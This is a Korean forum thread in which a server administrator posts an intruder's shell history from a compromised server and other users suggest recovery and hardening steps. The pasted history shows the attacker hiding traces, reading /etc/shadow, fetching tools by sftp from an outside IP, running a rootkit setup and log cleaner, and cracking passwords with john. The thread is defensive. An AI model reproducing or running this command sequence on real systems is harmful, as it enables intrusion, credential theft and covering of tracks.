자꾸 누가 서버를 이상하게 해놓네요.. ㅠ_ㅠ
글쓴이: serahero / 작성시간: 목, 2011/02/17 - 11:36오전
관리하고 있는 서버에 누군지 몰라도 자꾸 아래와 같이 해놓고 갑니다. ㅠ_ㅠ..
'
267 unset HISTFILe
268 w
269 uname -a
270 cat /etc/shadow
271 cd //
272 ls -as
273 cat .sh_history
274 ls -as
275 cat .rhosts
276 mkdir -p /dev/cua/...
277 cd /dev/cua/...
278 ls -as
279 sftp awsadmin@61.138.31.53
280 ls -as
281 tar xvf chg-bk
282 rm chg-bk
283 cd .chg-bk
284 ./setup
285 cd /dev/cua/...
286 chmod +x logs
287 ./logs -u root
288 tar xvf run.tar
289 cd run
290 ./john /etc/shadow
291 cd //
292 rm -rf /dev/cua/...
293 exit
294 ll
'
디스크 백업 해놓아서 교체 작업을 해줘는데요.
서버 보안이 취약해서 자꾸 이러는걸까요.
Forums:
Rootkit Hunter 같은 툴로 검사해 볼
Rootkit Hunter 같은 툴로 검사해 볼 필요가 있을 것 같지만,
저라면 서버를 포맷하고 다시 설치하겠습니다.
재설치만이 능사가 아니죠. 사용하시는 OS나
재설치만이 능사가 아니죠. 사용하시는 OS나 application에 security hole이 존재할 것이고 그걸 이용해서 계속 들어오겠죠. OS와 사용하시는 application들도 업데이트를 해 주셔야 합니다.
답변감사합니다. ㅠ_ㅠ..
솔라리스 10으로 바꿔보도록 건의 해봐야 겠습니다.
누군지 몰라도 안들어 왔음 하는 바램이 간절합니다. 살려도~-_ㅡ..
OS를 바꾼다고 해서 해결될 문제가
OS를 바꾼다고 해서 해결될 문제가 아닙니다.
관리자가 지속적으로 관리를 해줘야죠.
설치만 해놓고 패치한번 안하면 뚫리는게 당연하죠.
http://star4u.org
http://mirror.star4u.org
귀척 ㅋㅋ
귀척 하시는 심정 ㅠ 이해는 가지만..
귀척은안먹힘.
OS 새 판으로 다시 설치하시고(솔라리스는 어떤게
OS 새 판으로 다시 설치하시고(솔라리스는 어떤게 상위 버전인진 모르겠지만) 불가피한 조치이지만, 사용자 계정 자료들 안에 back-door 이나 rootkit이 있는지 전부 한번 살펴 보시고 있으면 제거하셔야 겠조. 그래도 사람이 할 수 있는 것에는 한계가 있겠지만요.
그리고 주기적으로 시스템을 업데이트하거나 패치하는 정책을 마련하셔서 수행하시고 보안 관련 감사 도구를 도입하시는게 좋을 것 같네요.
더해서 Tripwire(?)나 AIDE 등을 도입해서 시스템 파일 변조 등을 감지하실 수 있게 준비해 두시구요. 불필요한 포트는 모두 닫으시고 그래도 안심이 안 되시면 방화벽도 어떻게 구축해 놓으시는게 좋을 것 같네요. Brute Force Attack 등에 대한 대비도 해 놓으셔서 어느 정도 이상으로 SSH 및 TELNET 등 접속 시도가 있으면 차단하도록 하는 조치도 해 두시는게 좋겠조. 이 경우는 별로 이건 도움이 안 되실 것 같습니다만.
저도 전문가가 아니라 자세히 말씀드리긴 어렵지만 이정도 해 놓으시면 그래도 조금 더 안전하지 않을까 싶습니다. 다른 분들 말씀 처럼 보안은 사람 손에 의해 이룩되는 거라고 생각합니다. 기계가 처리할 수 있는 부분은 한계가 있고 시스템을 사용하는건 결국 사람이고 사람 실수로 허점이 생기고 사람의 노력으로 이걸 막을 수 있는 것이니까요.
애고 잡소리가 많았습니다.
사람천사
많은 도움이 되었습니다.
보안점검표 새로 도입하기로 했습니다. 보안에 별 신경도 안썻는데 막상 이런일이 생기니 완벽한 시스템은 없다는게 느껴지네요.
보안의 중요성도 느끼고요. 감사합니다~